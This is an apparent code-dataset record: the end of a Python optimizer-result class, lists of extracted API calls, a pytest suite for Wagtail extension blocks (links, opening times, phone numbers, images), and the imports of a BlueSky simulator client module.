"appropriate prefix such as 'run_2_'."
)
optimize_result.id = new_id
self.list.append(optimize_result)
if sort:
self.sort()
def sort(self):
"""Sort the optimizer results by function value fval (ascending)."""
def get_fval(res):
return res.fval if not np.isnan(res.fval) else np.inf
self.list = sorted(self.list, key=get_fval)
def as_dataframe(self, keys=None) -> pd.DataFrame:
"""
Get as pandas DataFrame.
If keys is a list, return only the specified values, otherwise all.
"""
lst = self.as_list(keys)
df = pd.DataFrame(lst)
return df
def as_list(self, keys=None) -> Sequence:
"""
Get as list.
If keys is a list, return only the specified values.
Parameters
----------
keys: list(str), optional
Labels of the field to extract.
"""
lst = self.list
if keys is not None:
lst = [{key: res[key] for key in keys} for res in lst]
return lst
def get_for_key(self, key) -> list:
"""Extract the list of values for the specified key as a list."""
warnings.warn(
"get_for_key() is deprecated in favour of "
"optimize_result['key'] and will be removed in future "
"releases."
)
return [res[key] for res in self.list]
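# Usage sketch (not part of the original module): how results from several local
# optimizer runs would typically be collected, assuming `optimizer_results` is an
# iterable of OptimizerResult objects:
#     result = OptimizeResult()
#     for res in optimizer_results:
#         result.append(res)            # list is re-sorted by fval after appending
#     print(result.summary())
#     df = result.as_dataframe(keys=['fval', 'x', 'time'])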
| [
"pandas.DataFrame",
"copy.deepcopy",
"numpy.argmax",
"collections.Counter",
"numpy.isnan",
"numpy.argmin",
"numpy.max",
"numpy.mean",
"numpy.array",
"numpy.min",
"warnings.warn"
] | [((5219, 5238), 'copy.deepcopy', 'deepcopy', (['self.list'], {}), '(self.list)\n', (5227, 5238), False, 'from copy import deepcopy\n'), ((9657, 9674), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (9669, 9674), True, 'import pandas as pd\n'), ((10229, 10359), 'warnings.warn', 'warnings.warn', (['"""get_for_key() is deprecated in favour of optimize_result[\'key\'] and will be removed in future releases."""'], {}), '(\n "get_for_key() is deprecated in favour of optimize_result[\'key\'] and will be removed in future releases."\n )\n', (10242, 10359), False, 'import warnings\n'), ((2397, 2408), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2405, 2408), True, 'import numpy as np\n'), ((2500, 2514), 'numpy.array', 'np.array', (['grad'], {}), '(grad)\n', (2508, 2514), True, 'import numpy as np\n'), ((2577, 2591), 'numpy.array', 'np.array', (['hess'], {}), '(hess)\n', (2585, 2591), True, 'import numpy as np\n'), ((2653, 2666), 'numpy.array', 'np.array', (['res'], {}), '(res)\n', (2661, 2666), True, 'import numpy as np\n'), ((2728, 2742), 'numpy.array', 'np.array', (['sres'], {}), '(sres)\n', (2736, 2742), True, 'import numpy as np\n'), ((2971, 2983), 'numpy.array', 'np.array', (['x0'], {}), '(x0)\n', (2979, 2983), True, 'import numpy as np\n'), ((6330, 6348), 'numpy.mean', 'np.mean', (['self.time'], {}), '(self.time)\n', (6337, 6348), True, 'import numpy as np\n'), ((6395, 6412), 'numpy.max', 'np.max', (['self.time'], {}), '(self.time)\n', (6401, 6412), True, 'import numpy as np\n'), ((6512, 6529), 'numpy.min', 'np.min', (['self.time'], {}), '(self.time)\n', (6518, 6529), True, 'import numpy as np\n'), ((9336, 9354), 'numpy.isnan', 'np.isnan', (['res.fval'], {}), '(res.fval)\n', (9344, 9354), True, 'import numpy as np\n'), ((6442, 6462), 'numpy.argmax', 'np.argmax', (['self.time'], {}), '(self.time)\n', (6451, 6462), True, 'import numpy as np\n'), ((6559, 6579), 'numpy.argmin', 'np.argmin', (['self.time'], {}), '(self.time)\n', (6568, 6579), True, 'import numpy as np\n'), ((6204, 6225), 'collections.Counter', 'Counter', (['self.message'], {}), '(self.message)\n', (6211, 6225), False, 'from collections import Counter\n')] |
import datetime
import pytest
from unittest.mock import patch
from django.core.exceptions import ValidationError
from freezegun import freeze_time
from phonenumber_field.phonenumber import PhoneNumber
from wagtail.core.models import Page
from wagtail_extensions.blocks import (
DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock
)
@pytest.mark.django_db
@pytest.fixture
def page():
# Homepage is created by Wagtail's initial migrations
# But let's create our own child page for testing with.
homepage = Page.objects.get(url_path='/home/')
page = Page(title='A test page', slug="test")
homepage.add_child(instance=page)
return page
def test_department_block_clean_invalid():
department = DepartmentBlock()
with pytest.raises(ValidationError):
department.clean({})
def test_department_block_clean_valid_with_both():
department = DepartmentBlock()
department.clean({'name':'Test', 'email':'<EMAIL>', 'phones': ['+447528712345']})
def test_department_block_to_python_empty():
department = DepartmentBlock()
department.to_python({})
def test_department_block_to_python_strip_empty_phonenumbers():
department = DepartmentBlock()
value = department.get_prep_value({'phones': ['', '+447528712345', '']})
assert value['phones'] == ['+447528712345']
def test_link_block_with_url():
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == '/hello/'
def test_link_block_with_url_and_text():
block = LinkBlock()
value = block.to_python({
'text': 'Hello World',
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == 'Hello World'
def test_link_block_with_empty_string_text():
block = LinkBlock()
value = block.to_python({
'text': '',
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == '/hello/'
def test_link_block_with_missing_streamblock():
block = LinkBlock()
value = block.to_python({
'text': '',
'link': []
})
assert value.link_url == ''
assert value.link_text == ''
@pytest.mark.django_db
def test_link_block_with_page(page):
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'page', 'value': page.pk}]
})
assert value.link_url == page.url
assert value.link_text == page.title
@pytest.mark.django_db
def test_link_block_with_page_that_no_longer_exists(page):
"""
If a page referenced by a PageChooserBlock has been deleted, the block value will be None.
"""
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'page', 'value': None}]
})
assert value.link_url == ''
assert value.link_text == ''
@pytest.mark.django_db
def test_link_block_with_page_and_text(page):
block = LinkBlock()
value = block.to_python({
        'text': 'Hello World',
'link': [{'type': 'page', 'value': page.pk}]
})
assert value.link_url == page.url
assert value.link_text == 'Hello World'
def test_link_block_clean_for_required():
block = LinkBlock()
value = block.to_python({
'text': 'Hello World',
'link': [] # This must not be empty if the field is required
})
with pytest.raises(ValidationError):
block.clean(value)
def test_link_block_clean_for_not_required():
block = LinkBlock(required=False)
value = block.to_python({
'text': '<NAME>',
'link': [] # Can be empty if the field is not required
})
# This should not raise an exception
block.clean(value)
@freeze_time("2017-01-01")
def test_openingtime_block_clean_date_in_past():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'date': '2016-01-01'})
def test_openingtime_block_clean_end_before_start():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'start': '20:00', 'end': '08:00', 'weekday': '1'})
def test_openingtime_block_clean_no_weekday_or_date():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'start': '20:00', 'end': '08:00'})
@freeze_time("2017-01-01")
def test_openingtime_block_clean_valid():
openingtime = OpeningTimeBlock()
openingtime.clean({'start': '08:00', 'end': '20:00', 'date': '2017-01-01'})
def test_openingtime_block_to_python_empty():
openingtime = OpeningTimeBlock()
openingtime.to_python({'label': '', 'date': None, 'closed': False, 'start': None, 'end': None, 'weekday': ''})
# Pass without error
def test_openingtime_block_to_python_cast_weekday():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({'weekday': '5'})
assert value['weekday'] == 5
def test_openingtime_block_to_python_public_label():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({'weekday': '7'})
assert value['label'] == OpeningTimeBlock.PUBLIC_LABEL
def test_openingtime_block_to_python_public_with_label():
openingtime = OpeningTimeBlock()
label = 'Easter sunday'
value = openingtime.to_python({'weekday': '7', 'label': label})
assert value['label'] == label
def test_openingtime_block_single_date_empty():
assert OpeningTimeBlock.single_date({}) == False
def test_openingtime_block_single_date_with_date():
assert OpeningTimeBlock.single_date({'date': 'some date'}) == True
def test_openingtime_block_single_date_public():
assert OpeningTimeBlock.single_date({'weekday': 7}) == True
def test_openingtime_block_next_date_empty():
assert OpeningTimeBlock.next_date({}) is None
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_today():
assert OpeningTimeBlock.next_date({'weekday': 2}) == datetime.date(2017, 12, 13)
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_sunday():
assert OpeningTimeBlock.next_date({'weekday': 6}) == datetime.date(2017, 12, 17)
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_public():
assert OpeningTimeBlock.next_date({'weekday': 7}) is None
def test_openingtimes_block_time_keyfunc_specific():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({})
with patch.object(openingtime, 'single_date', return_value=True):
out = OpeningTimesBlock.time_keyfunc(value)
assert out is value
def test_openingtimes_block_time_keyfunc_non_specific():
value = OpeningTimeBlock().to_python({'closed': False, 'start': '5:00', 'end': '10:00'})
out = OpeningTimesBlock.time_keyfunc(value)
assert out == (False, datetime.time(5), datetime.time(10))
@patch('wagtail_extensions.blocks.groupby')
def test_openingtimes_block_group_times(mocked_groupby):
value = {}
mocked_groupby.return_value = [('first', [1, 4, 5]), ('second', [7, 10])]
out = OpeningTimesBlock.group_times(value)
assert out == [[1, 4, 5], [7, 10]]
mocked_groupby.assert_called_once_with(value, OpeningTimesBlock.time_keyfunc)
def test_openingtimes_block_get_time_for_date_empty():
assert OpeningTimesBlock.get_time_for_date(None, None) is None
def test_openingtimes_block_get_time_for_date_no_times():
assert OpeningTimesBlock.get_time_for_date({}, datetime.date(2017, 12, 10)) is None
def test_openingtimes_block_get_time_for_date_times_date():
match = {'date': datetime.date(2017, 12, 10)}
value = {
'times': [
{'weekday': 4},
match,
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 10)) == match
def test_openingtimes_block_get_time_for_date_times_weekday():
match = {'weekday': 6}
value = {
'times': [
{'weekday': 4},
{'date': datetime.date(2017, 12, 10)},
match,
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 17)) == match
def test_openingtimes_block_get_time_for_date_times_no_match():
value = {
'times': [
{'weekday': 4},
{'date': datetime.date(2017, 12, 10)},
{'weekday': 2},
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 17)) is None
@freeze_time('2017-06-28')
def test_openingtimes_block_opening_today():
openingtimes = OpeningTimesBlock
with patch.object(openingtimes, 'get_time_for_date') as mocked_get:
value = 'test'
out = openingtimes.opening_today(value)
mocked_get.assert_called_once_with(value, datetime.date(2017, 6, 28))
assert out == mocked_get.return_value
def test_openingtimes_block_get_context():
openingtimes = OpeningTimesBlock()
value = {'times': [1, 5, 10]}
with patch.object(openingtimes, 'group_times') as mocked_group,\
patch.object(openingtimes, 'opening_today') as mocked_today:
ctx = openingtimes.get_context(value)
mocked_group.assert_called_once_with([1, 5, 10])
mocked_today.assert_called_once_with(value)
assert ctx['times'] == mocked_group.return_value
assert ctx['today'] == mocked_today.return_value
def test_phone_block_get_prep_value():
phone = PhoneBlock()
number = PhoneNumber.from_string('+447528712345')
number_str = phone.get_prep_value(number)
assert number_str == '+447528712345'
def test_phone_block_to_python():
phone = PhoneBlock()
number = phone.to_python('+447528712345')
assert number == PhoneNumber.from_string('+447528712345')
def test_phone_block_to_python_empty():
phone = PhoneBlock()
assert phone.to_python('') == ''
def test_images_block_get_context():
block = ImagesBlock()
assert block.get_context({'images': ['an image', 'another image', 'yet another image']})['column_width'] == 4
def test_images_block_get_context_empty_list():
block = ImagesBlock()
assert block.get_context({})['column_width'] == 12
| [
"wagtail.core.models.Page",
"wagtail_extensions.blocks.OpeningTimeBlock",
"wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc",
"wagtail_extensions.blocks.OpeningTimesBlock",
"datetime.time",
"wagtail_extensions.blocks.OpeningTimesBlock.group_times",
"wagtail.core.models.Page.objects.get",
"unittest.mock.patch.object",
"wagtail_extensions.blocks.ImagesBlock",
"pytest.raises",
"wagtail_extensions.blocks.OpeningTimeBlock.next_date",
"phonenumber_field.phonenumber.PhoneNumber.from_string",
"wagtail_extensions.blocks.OpeningTimesBlock.get_time_for_date",
"datetime.date",
"unittest.mock.patch",
"wagtail_extensions.blocks.OpeningTimeBlock.single_date",
"wagtail_extensions.blocks.PhoneBlock",
"wagtail_extensions.blocks.DepartmentBlock",
"wagtail_extensions.blocks.LinkBlock",
"freezegun.freeze_time"
] | [((3823, 3848), 'freezegun.freeze_time', 'freeze_time', (['"""2017-01-01"""'], {}), "('2017-01-01')\n", (3834, 3848), False, 'from freezegun import freeze_time\n'), ((4437, 4462), 'freezegun.freeze_time', 'freeze_time', (['"""2017-01-01"""'], {}), "('2017-01-01')\n", (4448, 4462), False, 'from freezegun import freeze_time\n'), ((5899, 5924), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (5910, 5924), False, 'from freezegun import freeze_time\n'), ((6059, 6084), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (6070, 6084), False, 'from freezegun import freeze_time\n'), ((6220, 6245), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (6231, 6245), False, 'from freezegun import freeze_time\n'), ((6897, 6939), 'unittest.mock.patch', 'patch', (['"""wagtail_extensions.blocks.groupby"""'], {}), "('wagtail_extensions.blocks.groupby')\n", (6902, 6939), False, 'from unittest.mock import patch\n'), ((8481, 8506), 'freezegun.freeze_time', 'freeze_time', (['"""2017-06-28"""'], {}), "('2017-06-28')\n", (8492, 8506), False, 'from freezegun import freeze_time\n'), ((561, 596), 'wagtail.core.models.Page.objects.get', 'Page.objects.get', ([], {'url_path': '"""/home/"""'}), "(url_path='/home/')\n", (577, 596), False, 'from wagtail.core.models import Page\n'), ((608, 646), 'wagtail.core.models.Page', 'Page', ([], {'title': '"""A test page"""', 'slug': '"""test"""'}), "(title='A test page', slug='test')\n", (612, 646), False, 'from wagtail.core.models import Page\n'), ((763, 780), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (778, 780), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((921, 938), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (936, 938), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1089, 1106), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (1104, 1106), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1219, 1236), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (1234, 1236), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1408, 1419), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1417, 1419), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1646, 1657), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1655, 1657), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1923, 1934), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1932, 1934), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((2187, 2198), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2196, 2198), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), 
((2414, 2425), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2423, 2425), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((2803, 2814), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2812, 2814), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3051, 3062), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (3060, 3062), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3317, 3328), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (3326, 3328), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3599, 3624), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {'required': '(False)'}), '(required=False)\n', (3608, 3624), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3916, 3934), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (3932, 3934), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4099, 4117), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4115, 4117), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4312, 4330), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4328, 4330), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4523, 4541), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4539, 4541), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4688, 4706), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4704, 4706), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4920, 4938), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4936, 4938), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5097, 5115), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (5113, 5115), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5305, 5323), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (5321, 5323), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6428, 6446), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (6444, 6446), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6793, 6830), 
'wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc', 'OpeningTimesBlock.time_keyfunc', (['value'], {}), '(value)\n', (6823, 6830), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7100, 7136), 'wagtail_extensions.blocks.OpeningTimesBlock.group_times', 'OpeningTimesBlock.group_times', (['value'], {}), '(value)\n', (7129, 7136), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((8920, 8939), 'wagtail_extensions.blocks.OpeningTimesBlock', 'OpeningTimesBlock', ([], {}), '()\n', (8937, 8939), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9436, 9448), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9446, 9448), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9462, 9502), 'phonenumber_field.phonenumber.PhoneNumber.from_string', 'PhoneNumber.from_string', (['"""+447528712345"""'], {}), "('+447528712345')\n", (9485, 9502), False, 'from phonenumber_field.phonenumber import PhoneNumber\n'), ((9638, 9650), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9648, 9650), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9813, 9825), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9823, 9825), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9914, 9927), 'wagtail_extensions.blocks.ImagesBlock', 'ImagesBlock', ([], {}), '()\n', (9925, 9927), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((10104, 10117), 'wagtail_extensions.blocks.ImagesBlock', 'ImagesBlock', ([], {}), '()\n', (10115, 10117), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((790, 820), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (803, 820), False, 'import pytest\n'), ((3480, 3510), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (3493, 3510), False, 'import pytest\n'), ((3944, 3974), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (3957, 3974), False, 'import pytest\n'), ((4127, 4157), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4140, 4157), False, 'import pytest\n'), ((4340, 4370), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4353, 4370), False, 'import pytest\n'), ((5516, 5548), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (['{}'], {}), '({})\n', (5544, 5548), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5623, 5674), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (["{'date': 'some date'}"], {}), "({'date': 'some date'})\n", (5651, 5674), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, 
PhoneBlock\n'), ((5745, 5789), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (["{'weekday': 7}"], {}), "({'weekday': 7})\n", (5773, 5789), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5857, 5887), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (['{}'], {}), '({})\n', (5883, 5887), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5982, 6024), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 2}"], {}), "({'weekday': 2})\n", (6008, 6024), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6028, 6055), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(13)'], {}), '(2017, 12, 13)\n', (6041, 6055), False, 'import datetime\n'), ((6143, 6185), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 6}"], {}), "({'weekday': 6})\n", (6169, 6185), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6189, 6216), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (6202, 6216), False, 'import datetime\n'), ((6304, 6346), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 7}"], {}), "({'weekday': 7})\n", (6330, 6346), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6494, 6553), 'unittest.mock.patch.object', 'patch.object', (['openingtime', '"""single_date"""'], {'return_value': '(True)'}), "(openingtime, 'single_date', return_value=True)\n", (6506, 6553), False, 'from unittest.mock import patch\n'), ((6569, 6606), 'wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc', 'OpeningTimesBlock.time_keyfunc', (['value'], {}), '(value)\n', (6599, 6606), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7327, 7374), 'wagtail_extensions.blocks.OpeningTimesBlock.get_time_for_date', 'OpeningTimesBlock.get_time_for_date', (['None', 'None'], {}), '(None, None)\n', (7362, 7374), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7614, 7641), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7627, 7641), False, 'import datetime\n'), ((8598, 8645), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""get_time_for_date"""'], {}), "(openingtimes, 'get_time_for_date')\n", (8610, 8645), False, 'from unittest.mock import patch\n'), ((8983, 9024), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""group_times"""'], {}), "(openingtimes, 'group_times')\n", (8995, 9024), False, 'from unittest.mock import patch\n'), ((9053, 9096), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""opening_today"""'], {}), "(openingtimes, 'opening_today')\n", (9065, 9096), False, 'from unittest.mock import patch\n'), ((9718, 9758), 'phonenumber_field.phonenumber.PhoneNumber.from_string', 'PhoneNumber.from_string', (['"""+447528712345"""'], {}), 
"('+447528712345')\n", (9741, 9758), False, 'from phonenumber_field.phonenumber import PhoneNumber\n'), ((6702, 6720), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (6718, 6720), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6857, 6873), 'datetime.time', 'datetime.time', (['(5)'], {}), '(5)\n', (6870, 6873), False, 'import datetime\n'), ((6875, 6892), 'datetime.time', 'datetime.time', (['(10)'], {}), '(10)\n', (6888, 6892), False, 'import datetime\n'), ((7494, 7521), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7507, 7521), False, 'import datetime\n'), ((7794, 7821), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7807, 7821), False, 'import datetime\n'), ((8126, 8153), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (8139, 8153), False, 'import datetime\n'), ((8441, 8468), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (8454, 8468), False, 'import datetime\n'), ((8782, 8808), 'datetime.date', 'datetime.date', (['(2017)', '(6)', '(28)'], {}), '(2017, 6, 28)\n', (8795, 8808), False, 'import datetime\n'), ((8006, 8033), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (8019, 8033), False, 'import datetime\n'), ((8312, 8339), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (8325, 8339), False, 'import datetime\n')] |
"""
BlueSky simulation client class
"""
# TODO: Need to re-add the tests for string parsing/units from the old API tests
import os
from typing import List
from semver import VersionInfo
from .bluesky_aircraft_controls import BlueSkyAircraftControls
from .bluesky_simulator_controls import BlueSkySimulatorControls
from bluebird.settings import Settings
from bluebird.sim_client.bluesky.bluesky_client import BlueSkyClient
from bluebird.utils.abstract_sim_client import AbstractSimClient
from bluebird.utils.timer import Timer
